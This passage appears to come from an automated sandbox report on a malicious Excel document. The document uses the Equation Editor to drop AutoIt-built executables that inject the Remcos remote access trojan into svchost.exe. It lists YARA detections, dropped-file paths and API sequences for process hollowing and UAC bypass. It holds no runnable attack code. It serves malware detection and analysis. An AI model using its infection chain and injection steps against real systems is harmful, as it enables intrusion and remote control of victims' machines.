          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002A9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,3_2_002A9576
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_01119576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,16_2_01119576

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTR
          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTR

          System Summary

          barindex
          Source: sheet1.xml, type: SAMPLEMatched rule: detects AutoLoad documents using LegacyDrawing Author: ditekSHen
          Source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 17.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 16.2.Bactris.exe.2990000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 16.2.Bactris.exe.2990000.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 17.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000011.00000002.783602919.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
          Source: 00000010.00000002.762640645.0000000002990000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
          Source: Process Memory Space: Bactris.exe PID: 3740, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: Process Memory Space: svchost.exe PID: 3680, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
          Source: YED.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: YED.exe, 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_724e584b-d
          Source: YED.exe, 00000003.00000002.760359248.00000000002D2000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_5ad92b34-6
          Source: YED.exe, 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_dc3c8c8e-f
          Source: YED.exe, 00000003.00000003.756895707.0000000002A91000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_ba9b0a42-7
          Source: Bactris.exeString found in binary or memory: This is a third-party compiled AutoIt script.
          Source: Bactris.exe, 00000010.00000000.760231345.0000000001142000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_75d036b4-d
          Source: Bactris.exe, 00000010.00000000.760231345.0000000001142000.00000002.00000001.01000000.00000004.sdmpString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_942574d1-6
          Source: YED.exe.2.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c565d1f2-8
          Source: YED.exe.2.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_32c3c399-9
          Source: Bactris.exe.3.drString found in binary or memory: This is a third-party compiled AutoIt script.memstr_8317b557-0
          Source: Bactris.exe.3.drString found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainermemstr_f929ebf5-f
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\YED.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\YED.exeProcess Stats: CPU usage > 49%
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\YED.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeMemory allocated: 770B0000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,17_2_004180EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004132D2 OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,17_2_004132D2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0041BB09 OpenProcess,NtSuspendProcess,CloseHandle,17_2_0041BB09
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0041BB35 OpenProcess,NtResumeProcess,CloseHandle,17_2_0041BB35
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0027D5EB: CreateFileW,DeviceIoControl,CloseHandle,3_2_0027D5EB
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00271201 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,GetProcessHeap,HeapFree,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,3_2_00271201
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0027E8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,3_2_0027E8F6
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010EE8F6 ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,16_2_010EE8F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004167B4 ExitWindowsEx,LoadLibraryA,GetProcAddress,17_2_004167B4
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029EA3AC3_3_029EA3AC
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_02A061D93_3_02A061D9
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029F07943_3_029F0794
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029D85C03_3_029D85C0
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029F0B063_3_029F0B06
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029EAB313_3_029EAB31
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029F6E4A3_3_029F6E4A
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029F6C1B3_3_029F6C1B
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029F0DB03_3_029F0DB0
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029D6D203_3_029D6D20
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029E8D7D3_3_029E8D7D
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_02A092EE3_3_02A092EE
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_02A5B2443_3_02A5B244
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029F13323_3_029F1332
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029DB3403_3_029DB340
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029F70A73_3_029F70A7
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029F10773_3_029F1077
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_02A376983_3_02A37698
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_02A414463_3_02A41446
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029D74603_3_029D7460
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_02A05B6B3_3_02A05B6B
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_02A0D8FF3_3_02A0D8FF
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029FBEA03_3_029FBEA0
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_029DBEF03_3_029DBEF0
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_3_02A63C733_3_02A63C73
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0021BF403_2_0021BF40
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002180603_2_00218060
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002820463_2_00282046
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002782983_2_00278298
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0024E4FF3_2_0024E4FF
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0024676B3_2_0024676B
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002A48733_2_002A4873
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0023CAA03_2_0023CAA0
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0021CAF03_2_0021CAF0
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0022CC393_2_0022CC39
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_00246DD93_2_00246DD9
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0022B1193_2_0022B119
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002191C03_2_002191C0
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002313943_2_00231394
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_002317063_2_00231706
          Source: C:\Users\user\AppData\Roaming\YED.exeCode function: 3_2_0023781B3_2_0023781B
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010F204616_2_010F2046
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_0108806016_2_01088060
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010E829816_2_010E8298
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010BE4FF16_2_010BE4FF
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010B676B16_2_010B676B
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_0111487316_2_01114873
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010ACAA016_2_010ACAA0
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_0108CAF016_2_0108CAF0
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010B6DD916_2_010B6DD9
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_0109CC3916_2_0109CC39
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_0109B11916_2_0109B119
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010891C016_2_010891C0
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A139416_2_010A1394
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A170616_2_010A1706
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_0108792016_2_01087920
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_0109997D16_2_0109997D
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A19B016_2_010A19B0
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A781B16_2_010A781B
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A7A4A16_2_010A7A4A
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A1C7716_2_010A1C77
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A7CA716_2_010A7CA7
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010A1F3216_2_010A1F32
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_0110BE4416_2_0110BE44
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_010B9EEE16_2_010B9EEE
          Source: C:\Users\user\AppData\Local\eupolyzoan\Bactris.exeCode function: 16_2_001136A016_2_001136A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0043E0CC17_2_0043E0CC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0041F0FA17_2_0041F0FA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0045415917_2_00454159
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0043816817_2_00438168
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004461F017_2_004461F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0043E2FB17_2_0043E2FB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0045332B17_2_0045332B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0042739D17_2_0042739D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004374E617_2_004374E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0043E55817_2_0043E558
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0043877017_2_00438770
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_004378FE17_2_004378FE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0043394617_2_00433946
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0044D9C917_2_0044D9C9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00427A4617_2_00427A46
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0041DB6217_2_0041DB62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00427BAF17_2_00427BAF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00437D3317_2_00437D33
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00435E5E17_2_00435E5E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00426E0E17_2_00426E0E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0043DE9D17_2_0043DE9D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00413FCA17_2_00413FCA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_00436FEA17_2_00436FEA
